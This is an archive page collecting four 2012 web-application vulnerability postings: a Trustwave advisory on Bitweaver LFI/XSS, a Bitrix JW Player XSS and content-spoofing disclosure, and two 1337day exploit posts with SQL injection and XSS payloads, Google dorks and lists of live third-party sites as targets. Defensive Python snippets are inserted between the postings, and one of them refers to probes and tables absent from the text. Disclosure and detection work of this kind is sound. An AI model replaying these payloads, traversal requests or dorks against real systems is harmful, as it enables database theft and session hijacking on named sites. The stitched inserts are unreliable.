Archive for 25 October 2012

Bitweaver 2.8.1 Multiple Vulnerabilities

Multiple XSS vulnerabilities were found in Bitweaver version 2.8.1. The vulnerabilities in the script, where they occur, and the descriptions of them are as follows:

Trustwave SpiderLabs Security Advisory TWSL2012-016:
Multiple Vulnerabilities in Bitweaver

Published: 10/23/2012
Version: 1.0

Vendor: Bitweaver (http://www.bitweaver.org/)
Product: Bitweaver
Version affected: 2.8.1 and earlier versions

Product description:
Bitweaver is a free and open source web application framework and content
management system. Bitweaver is written in PHP and uses Firebird as a
database backend.

Credit: David Aaron and Jonathan Claudius of Trustwave SpiderLabs

Finding 1: Local File Inclusion Vulnerability
CVE: CVE-2012-5192

The 'overlay_type' parameter in the 'gmap/view_overlay.php' page in
Bitweaver is vulnerable to a local file inclusion vulnerability.

This vulnerability can be demonstrated by traversing to a known readable
path on the web server file system.

Example:

Performing LFI on 'overlay_type' parameter

#Request

http://A.B.C.D/bitweaver/gmap/view_overlay.php?overlay_type=..%2F..%2F..%2F..%2F..%2F..%2F..%2F/etc/passwd%00

#Response

root:x:0:0:root:/root:/bin/bash
<snip>

Finding 2: Multiple XSS Vulnerabilities in Bitweaver
CVE: CVE-2012-5193 

Multiple cross-site scripting (XSS) vulnerabilities have been discovered
that allow remote unauthenticated users to run arbitrary scripts on the
system.

Example:

The following Proof of Concepts illustrate that Bitweaver 2.8.1 is
vulnerable to XSS.

Example(s):

1. Performing XSS on stats/index.php

#Request

GET /bitweaver/stats/index.php/%22%3E%3Cscript%3Ealert('XSS')%3B%3C%2Fscript%3E HTTP/1.0

#Response

HTTP/1.1 200 OK
Date: Tue, 17 Apr 2012 15:42:34 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Powered-By: PHP/5.3.6-13ubuntu3.6
Set-Cookie: BWSESSION=4gmfnd86ahtvn34v5oejgivvh3; path=/bitweaver/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
[truncated due to length]

2. Performing XSS on /newsletters/edition.php

#Request

GET /bitweaver/newsletters/edition.php/%22%3E%3Cscript%3Ealert('XSS')%3B%3C%2Fscript%3E HTTP/1.0

#Response

HTTP/1.1 200 OK
Date: Tue, 17 Apr 2012 15:42:02 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Powered-By: PHP/5.3.6-13ubuntu3.6
Set-Cookie: BWSESSION=ajdjp797r7atral75rmlhcgs63; path=/bitweaver/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
[truncated due to length]

3. Performing XSS on the 'username' parameter available on /users/

#Request

POST /bitweaver/users/remind_password.php HTTP/1.1
Host: A.B.C.D
Content-Type: application/x-www-form-urlencoded
Content-Length: 192

username=%22%3E%3Cscript%3Ealert('XSS')%3B%3C%2Fscript%3E&remind=Reset+%28password%29

#Response

HTTP/1.1 200 OK
Date: Tue, 17 Apr 2012 15:53:11 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Powered-By: PHP/5.3.6-13ubuntu3.6
Set-Cookie: BWSESSION=i0ktqmt3497thag552t9ds78v4; path=/bitweaver/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 15974
[truncated due to length]

<snip>
Invalid or unknown username: ">alert('XSS');</p></div>Please follow the instructions in the email.
<snip>

4. Performing XSS on the 'days' parameter on /stats/index.php

#Request

POST /bitweaver/stats/index.php HTTP/1.1
Host: A.B.C.D
Content-Type: application/x-www-form-urlencoded
Content-Length: 177

days=%22%3E%3Cscript%3Ealert('XSS')%3B%3C%2Fscript%3E&pv_chart=Display

#Response
HTTP/1.1 200 OK
Date: Tue, 17 Apr 2012 15:55:53 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Powered-By: PHP/5.3.6-13ubuntu3.6
Set-Cookie: BWSESSION=dqdvcnmql8jhngp0tphseh1qh4; path=/bitweaver/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 24778
[truncated due to length]

<snip>
<img src="/stats/pv_chart.php?days="><script>alert('XSS');</script>" alt="Site Usage Statistics" />
<snip>

5. Performing XSS on the 'login' parameter on /users/register.php. (try
entering "><IFRAME src="https://www.trustwave.com" height="1000px"
width="1000px"> into the "Username field"):

http://A.B.C.D/bitweaver/users/register.php


6. Performing XSS on the 'highlight' parameter:

#Request

GET /bitweaver/?highlight=%2522%253E%253Cscript%253Ealert('XSS')%253B%253C%252Fscript%253E HTTP/1.0

#Response

HTTP/1.1 200 OK
Date: Tue, 17 Apr 2012 15:59:09 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Powered-By: PHP/5.3.6-13ubuntu3.6
Set-Cookie: BWSESSION=ama93jqlojmi385plkft5opl64; path=/bitweaver/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
[truncated due to length]

Remediation Steps:
The vendor has released a fix to address the Local File Inclusion
vulnerability (finding 1) and several of the Cross-Site Scripting
vulnerabilities (finding 2) in Bitweaver 3.1. However, additional fixes for
the Cross-site Scripting vulnerabilities were made on commit c3bef6f in the
development branch.  Users are recommended to download the latest release
of Bitweaver on http://github.com/bitweaver to address the above issues.

These issues can also be mitigated with the use of technologies such as Web
Application Firewalls (WAF) or Intrusion Prevention Systems (IPS). Often,
Vulnerability Scanners and Intrusion Detection Systems (IDS) can detect the
presence of Local File Inclusion vulnerabilities and XSS. Trustwave
technologies that address these issues include the following.

ModSecurity (http://www.modsecurity.org/) has added rules to the commercial
rules feed for these issues, available as part of the SpiderLabs
ModSecurity rules feed.

Trustwave's vulnerability scanning solution, TrustKeeper
(https://www.trustwave.com/trustKeeper.php), has been updated to detect
affected versions.
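As an added illustration of the log-based detection the remediation section refers to (this is not part of the Trustwave advisory): a small Python scanner that percent-decodes request targets from Apache-style access log lines, up to two rounds so the double-encoded 'highlight' probe is normalised like the single-encoded ones, and flags the traversal/null-byte and script-tag patterns used in the findings above. The log lines, client addresses and timestamps are constructed.

```python
import re
import urllib.parse
from typing import Dict, List

# Constructed sample log lines (Apache combined format) modelled on the
# requests in the advisory; hosts, sizes and timestamps are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [23/Oct/2012:10:01:02 +0000] "GET /bitweaver/gmap/view_overlay.php?overlay_type=..%2F..%2F..%2F..%2F..%2F..%2F..%2F/etc/passwd%00 HTTP/1.1" 200 1843 "-" "Mozilla/5.0"
10.0.0.5 - - [23/Oct/2012:10:01:09 +0000] "GET /bitweaver/stats/index.php/%22%3E%3Cscript%3Ealert('XSS')%3B%3C%2Fscript%3E HTTP/1.0" 200 5120 "-" "Mozilla/5.0"
10.0.0.5 - - [23/Oct/2012:10:01:15 +0000] "GET /bitweaver/?highlight=%2522%253E%253Cscript%253Ealert('XSS')%253B%253C%252Fscript%253E HTTP/1.0" 200 7220 "-" "Mozilla/5.0"
10.0.0.8 - - [23/Oct/2012:10:02:30 +0000] "GET /bitweaver/gmap/view_overlay.php?overlay_type=marker HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
10.0.0.8 - - [23/Oct/2012:10:02:41 +0000] "GET /bitweaver/?highlight=firebird HTTP/1.1" 200 9802 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
# Two or more "../" steps, or an embedded null byte (the %00 terminator in finding 1).
TRAVERSAL_RE = re.compile(r'(\.\./){2,}|\x00')
# A script tag, or the attribute/tag break-out prefix used by every PoC in finding 2.
XSS_RE = re.compile(r'<\s*script|["\']\s*>\s*<', re.IGNORECASE)


def normalise(target: str, rounds: int = 2) -> str:
    """Percent-decode up to `rounds` times; stops early once decoding is a no-op."""
    out = target
    for _ in range(rounds):
        decoded = urllib.parse.unquote(out)
        if decoded == out:
            break
        out = decoded
    return out


def classify(target: str) -> List[str]:
    """Tags for one request target (path + query), after decoding."""
    decoded = normalise(target)
    tags = []
    if TRAVERSAL_RE.search(decoded):
        tags.append("lfi-traversal")
    if XSS_RE.search(decoded):
        tags.append("reflected-xss-probe")
    return tags


def scan_log(text: str) -> List[Dict[str, str]]:
    """Parse each log line and return the suspicious ones with their tags."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        tags = classify(m.group("target"))
        if tags:
            hits.append({"ip": m.group("ip"), "target": m.group("target"), "tags": ",".join(tags)})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ip"], hit["tags"], hit["target"])
```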

References
http://www.bitweaver.org/
http://blog.spiderlabs.com/

Vendor Communication Timeline:
04/26/12 - Initial communications with vendor
05/14/12 - Vulnerability disclosed to vendor
05/30/12 - Vendor acknowledges version 3.0 fixes issues
06/07/12 - Contact vendor regarding incomplete fixes in 3.0
09/07/12 - Vendor publishes version 3.1
10/10/12 - Contact vendor regarding incomplete fixes in 3.1
10/23/12 - Advisory published

About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based
information security and payment card industry compliance management
solutions to businesses and government entities throughout the world. For
organizations faced with today's challenging data security and compliance
environment, Trustwave provides a unique approach with comprehensive
solutions that include its flagship TrustKeeper compliance management
software and other proprietary security solutions. Trustwave has helped
thousands of organizations--ranging from Fortune 500 businesses and large
financial institutions to small and medium-sized retailers--manage
compliance and secure their network infrastructure, data communications and
critical information assets. Trustwave is headquartered in Chicago with
offices throughout North America, South America, Europe, Africa, China and
Australia. For more information, visit https://www.trustwave.com

About Trustwave SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on
application security, incident response, penetration testing, physical
security and security research. The team has performed over a thousand
incident investigations, thousands of penetration tests and hundreds of
application security tests globally. In addition, the SpiderLabs Research
team provides intelligence through bleeding-edge research and proof of
concept tool development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs

Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.

Bitrix Site Manager 11.5 XSS / Content Spoofing

XSS / Content Spoofing vulnerabilities have been found in Bitrix Site Manager 11.5; where they occur and the descriptions of them are as follows:

I want to warn you about security vulnerabilities in Bitrix Site Manager. It
is a commercial CMS.

These are Content Spoofing and Cross-Site Scripting vulnerabilities. These
holes bypass the built-in WAF and all other protections of Bitrix.
 
------------------------- 
Affected products: 
------------------------- 
 
Bitrix Site Manager 11.5 and previous versions, which include JW Player Pro,
are vulnerable.

Versions of Bitrix 11.5 released after 2012.08.24 should not be affected, because
the developers fixed these holes after I informed them. As I have checked (on the
developers' main sites, where I found these vulnerabilities), they were fixed
by removing this flash file.

The vulnerabilities are similar to the ones in JW Player
(http://securityvulns.ru/docs28176.html) and JW Player Pro
(http://securityvulns.ru/docs28483.html).

To find these holes, which bypass the WAF and all their other protections,
1C-Bitrix had no need to waste their time and money on running a
competition at the hacking conference CC9
(http://www.1c-bitrix.ru/about/life/news/171346/) for bypassing their
Proactive Protection (WAF) and other protections of the CMS, or on working with a
security company, all of which were unable to find these holes in Bitrix for
many years; they should just have contacted me, or read my public advisory
from June concerning the vulnerabilities in JW Player.
 
---------- 
Details: 
---------- 
 
Content Spoofing (WASC-12): 
 
The file parameter can be set to either video or audio files.

The JW Player swf file accepts arbitrary addresses in the file and image
parameters, which allows spoofing the flash content, i.e. by setting the addresses
of video (audio) and/or image files from another site.
 
http://site/bitrix/components/bitrix/player/mediaplayer/player.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF 
http://site/bitrix/components/bitrix/player/mediaplayer/player.swf?file=1.flv&image=1.jpg 
 
The JW Player swf file accepts arbitrary addresses in the config parameter, which
allows spoofing the flash content, i.e. by setting the address of a config file
from another site (the file and image parameters in the xml file accept arbitrary
addresses). For a config file to be loaded from another site, that site needs to
have a crossdomain.xml.
 
http://site/bitrix/components/bitrix/player/mediaplayer/player.swf?config=1.xml 
 
1.xml 
 
<config> 
<file>1.flv</file> 
<image>1.jpg</image> 
</config> 
 
The JW Player swf file accepts arbitrary addresses in the playlistfile parameter,
which allows spoofing the flash content, i.e. by setting the address of a playlist
file from another site (the media:content and media:thumbnail parameters in the
xml file accept arbitrary addresses). For a playlist file to be loaded from
another site, that site needs to have a crossdomain.xml.
 
http://site/bitrix/components/bitrix/player/mediaplayer/player.swf?playlistfile=1.rss 
http://site/bitrix/components/bitrix/player/mediaplayer/player.swf?playlistfile=1.rss&playlist.position=right&playlist.size=200
 
1.rss 
 
<rss version="2.0" xmlns:media="http://search.yahoo.com/mrss/">
  <channel>
    <title>Example playlist</title>
    <item>
      <title>Video #1</title>
      <description>First video.</description>
      <media:content url="1.flv" duration="5" />
      <media:thumbnail url="1.jpg" />
    </item>
    <item>
      <title>Video #2</title>
      <description>Second video.</description>
      <media:content url="2.flv" duration="5" />
      <media:thumbnail url="2.jpg" />
    </item>
  </channel>
</rss>
 
XSS (WASC-08): 
 
http://site/bitrix/components/bitrix/player/mediaplayer/player.swf?playerready=alert(document.cookie) 
 
XSS (WASC-08): 
 
If, on a page of the site with jwplayer.swf (player.swf), it is possible
(via HTML injection) to include JS code with a callback function, and there
are 19 such functions in total, then an XSS attack can be conducted.
I.e. the JS callbacks can be used for an XSS attack.
 
Example of exploit: 
 
<script type="text/javascript" src="jwplayer.js"></script>
<div id="container">...</div>
<script type="text/javascript">
jwplayer("container").setup({
    flashplayer: "jwplayer.swf",
    file: "1.flv",
    autostart: true,
    height: 300,
    width: 480,
    events: {
        onReady: function() { alert(document.cookie); },
        onComplete: function() { alert(document.cookie); },
        onBufferChange: function() { alert(document.cookie); },
        onBufferFull: function() { alert(document.cookie); },
        onError: function() { alert(document.cookie); },
        onFullscreen: function() { alert(document.cookie); },
        onMeta: function() { alert(document.cookie); },
        onMute: function() { alert(document.cookie); },
        onPlaylist: function() { alert(document.cookie); },
        onPlaylistItem: function() { alert(document.cookie); },
        onResize: function() { alert(document.cookie); },
        onBeforePlay: function() { alert(document.cookie); },
        onPlay: function() { alert(document.cookie); },
        onPause: function() { alert(document.cookie); },
        onBuffer: function() { alert(document.cookie); },
        onSeek: function() { alert(document.cookie); },
        onIdle: function() { alert(document.cookie); },
        onTime: function() { alert(document.cookie); },
        onVolume: function() { alert(document.cookie); }
    }
});
</script>
 
There is a logo feature in the licensed version of the player. So in
licensed versions of the swf file there are also the following vulnerabilities:
 
Content Spoofing (WASC-12): 
 
http://site/bitrix/components/bitrix/player/mediaplayer/player.swf?file=1.flv&logo.file=1.jpg&logo.link=http://websecurity.com.ua 
 
XSS (WASC-08): 
 
http://site/bitrix/components/bitrix/player/mediaplayer/player.swf?file=1.flv&logo.file=1.jpg&logo.link=javascript:alert(document.cookie) 
 
Content Spoofing (WASC-12): 
 
http://site/bitrix/components/bitrix/player/mediaplayer/player.swf?abouttext=Player&aboutlink=http://site 
 
XSS (WASC-08): 
 
http://site/bitrix/components/bitrix/player/mediaplayer/player.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B 
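Added example, not from the advisory: a Python filter that an embedding page could apply to player.swf flashvars before emitting them. It accepts only relative references or same-host http(s) URLs for the URL-valued parameters and only a bare function name for the playerready callback, so the other-origin, javascript: and data: values shown above are dropped. Parameter names come from the advisory; `site_host`, the function names and the query-string parser are assumptions of this example.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Flashvars that take a URL (names from the advisory; logo.* and aboutlink
# only matter on the licensed build) and the JS-callback flashvar.
URL_PARAMS = ("file", "image", "config", "playlistfile", "logo.file", "logo.link", "aboutlink")
CALLBACK_PARAMS = ("playerready",)
ALLOWED_SCHEMES = ("http", "https")
# A dotted JS identifier such as jwReady or app.onReady, never code like alert(...)
JS_IDENT_RE = re.compile(r"^[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*$")


def parse_query(query):
    """Minimal query-string parser: splits only on '&', so a data: URL
    carrying ';base64' stays in one value (hypothetical helper)."""
    params = {}
    for pair in query.split("&"):
        if pair:
            name, _, raw = pair.partition("=")
            params[unquote_plus(name)] = unquote_plus(raw)
    return params


def is_safe_media_url(value, site_host):
    """Allow only relative references or http(s) URLs on our own host.
    Other origins enable content spoofing; javascript:/data: enable XSS."""
    parts = urlsplit(value.strip())
    if parts.scheme == "" and parts.netloc == "":
        return True                      # e.g. 1.flv, 1.xml, 1.rss
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False                     # javascript:, data:, //other-host
    return (parts.hostname or "").lower() == site_host.lower()


def is_safe_callback(value):
    """The playerready flashvar must name a function, not carry JS code."""
    return JS_IDENT_RE.match(value.strip()) is not None


def filter_player_query(query, site_host):
    """Return (kept, rejected): flashvars safe to pass to player.swf and the
    names of those dropped. Parameters not in either list pass unchanged."""
    kept, rejected = {}, []
    for name, value in parse_query(query).items():
        if name in URL_PARAMS:
            ok = is_safe_media_url(value, site_host)
        elif name in CALLBACK_PARAMS:
            ok = is_safe_callback(value)
        else:
            ok = True
        if ok:
            kept[name] = value
        else:
            rejected.append(name)
    return kept, rejected
```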
 
------------ 
Timeline: 
------------  
 
2012.08.16 - informed the developers about the first part of the vulnerabilities.
2012.08.17 - in reply to their answer, I gave the developers recommendations on
fixing the vulnerabilities.
2012.08.19 - informed the developers about the second part of the vulnerabilities.
2012.08.20 - announced at my site.
2012.08.24 - the developers informed me that they had fixed all these
vulnerabilities.
2012.10.20 - disclosed at my site (http://websecurity.com.ua/5992/).

Online Booking Manager Hotels Portal – SQLi Vulnerability

Online Booking Manager Hotels Portal – SQLi Vulnerability: the vulnerability and examples of its use are as follows:

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 
0     _                   __           __       __                     1 
1   /' \            __  /'__`\        /\ \__  /'__`\                   0 
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1 
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0 
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1 
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0 
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1 
1                  \ \____/ >> Exploit database separated by exploit   0 
0                   \/___/          type (local, remote, DoS, etc.)    1 
1                                                                      1 
0  [+] Site            : 1337day.com                                   0 
1  [+] Support e-mail  : submit[at]1337day.com                         1 
0                                                                      0 
1               #########################################              1 
0               I'm DaOne member from Inj3ct0r Team                    1 
1               #########################################              0 
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 
########################################## 
# Exploit Title: Online Booking Manager Hotels Portal - SQLi Vulnerability 
# Date: 2012-10-19 
# Author: DaOne aka Mocking Bird 
# Home: 1337day Inj3ct0r Exploit Database  
# Software Link: http://www.onlinebookingmanager.com/obm-portal-hotels/index.php 
# Category: webapps/php 
# Version: 5.2 
# Price: 912 USD 
# Google dork: inurl:besthotels.php?portalID= 
########################################## 
[#] Exploit: 
http://[host]/besthotels.php?orderBy=(ErrorBased Injection) 
orderBy=1+and(select 1 FROM(select count(*),concat((select (select concat(user(),database(),version())) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a) 
 
# Demo: 
http://www.stayinkos.com/hotels/besthotels.php?orderBy=1' 
http://ahabooking.com/besthotels.php?orderBy=1' 
http://bookingeurope.co/besthotels.php?orderBy=1' 
 
---- 
Thanks to: TheGreaTTeAm/LCA and Inj3ct0r Team. 

Dd'Linux – SQL Injection / Cross-Site Scripting Vulnerabilities

Dd'Linux SQL Injection / Cross-Site Scripting vulnerabilities were found. The descriptions of the vulnerabilities are as follows.

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0      _                   __           __       __                      1
1    /' \            __  /'__`\        /\ \__  /'__`\                    0
0   /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___            1
1   \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\           0
0      \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/            1
1       \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\            0
0        \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/            1
1                   \ \____/ >> Exploit database separated by exploit    0
0                    \/___/          type (local, remote, DoS, etc.)     1
1                                                                        1
0   [x] Official Website: http://www.1337day.com                         0
1   [x] Support E-mail  : mr.inj3ct0r[at]gmail[dot]com                   1
0                                                                        0
1               ==========================================               1
0               I'm Taurus Omar Member From Inj3ct0r TEAM                1
1               ==========================================               0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1
|                                                                        |
|    Dd'Linux - SQL Injection  / Cross-Site Scripting Vulnerabilities    |
--------------------------------------------------------------------------

+----------------| ABOUT ME |--------------------+
NAME:     TAURUS OMAR                            -
HOME:     ACCESOILEGAL.BLOGSPOT.COM              -
FBOOK:                    -
TWITTER:                             -
E-MAIL:   omar-taurus[at]dragonsecurity[dot]org  -
E-MAIL:   omar-taurus[at]live[dot]com            -
PWNED:    #ZUUU                                  -
+------------------------------------------------+

# Exploit Title: Dd'linux - SQL Injection  / Cross-Site Scripting Vulnerabilities
# Vendor Name: Dd'linux
# Url Vendor: http://www.ddlinux.com/
# Category: WebApps
# Type: php
# Risk:  Critical
# Dork: intext:"Desarrollado por dd'linux"

# Example/Sql=> http://site.com/xxxx?id=1
# Example/Xss=> http://site.com/search.php [XSS]


# Sample/Sql

# Command/Sql/Payload=> UNION ALL SELECT CONCAT(CHAR(58,105,107,113,58),IFNULL(CAST(CHAR(115,80,76,103,105,73,101,82,73,107) AS CHAR),CHAR(32)),CHAR(58,100,113,119,58)), NULL#

# Info => Same tables and columns on all vulnerable sites
+-------------------------+
| agenda                  |
| album                   |
| banner                  |
| banner_ubicacion        |
| contador                |
| imagen                  |
| imagenes_animacion      |
| mails                   |
| mails_paginas           |
| noticia                 |
| opcion                  |
| opcion1                 |
| opcion2                 |
| opciones                |
| opciones1               |
| transparencia_archivo   |
| transparencia_categoria |
| users                   |
| varios                  |
+-------------------------+

# Sample/Xss
http://david.ddlinux.com/buscar.php
http://www.fmrumba.com/buscar.php
http://www.babahoyo.gob.ec/buscar.php

# Command/Xss/=> "><img src=x onerror=alert("1337");>

# Vulnerability/Code
<tbody><tr>
<td><input name="busqueda" id="busqueda" value="" size="15" type="text">
<input name="Submit" class="secondaryAction" id="Submit" value="" type="submit"></td>
</tr>
</tbody>
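Added example (not the posting's code): the two Dd'Linux findings side by side in Python, with sqlite3 as a stand-in for the site's database. It shows the string-spliced query that the %' probe breaks, its parameterised replacement, and the buscar.php search input with the reflected busqueda value escaped. The album schema, its rows and the function names are constructed for this example; the real schema is not published.

```python
import html
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the site's `album` table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE album (codigo_album INTEGER PRIMARY KEY, nombre TEXT)")
    conn.executemany("INSERT INTO album VALUES (?, ?)", [(4, "Eventos"), (12, "Galeria 2012")])
    return conn


def fotos_vulnerable(conn, codigo_album):
    """The pattern the %' probe detects: the raw GET parameter is spliced into SQL,
    so a stray quote changes the statement and the database reports an error."""
    sql = "SELECT nombre FROM album WHERE codigo_album = '%s'" % codigo_album
    return [row[0] for row in conn.execute(sql)]


def fotos_parameterised(conn, codigo_album):
    """Hardened form: the value is bound, never parsed as SQL; the quote is
    just data and simply matches no row."""
    sql = "SELECT nombre FROM album WHERE codigo_album = ?"
    return [row[0] for row in conn.execute(sql, (codigo_album,))]


def probe(conn, value):
    """'error' when the spliced query fails to parse (what the %' probe looks for),
    'ok' otherwise."""
    try:
        fotos_vulnerable(conn, value)
        return "ok"
    except sqlite3.OperationalError:
        return "error"


def search_form(busqueda):
    """Hardened version of the search input from the posting: the reflected value
    is HTML-escaped (including quotes) so it cannot close the attribute."""
    return ('<input name="busqueda" id="busqueda" value="%s" size="15" type="text">'
            % html.escape(busqueda, quote=True))
```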
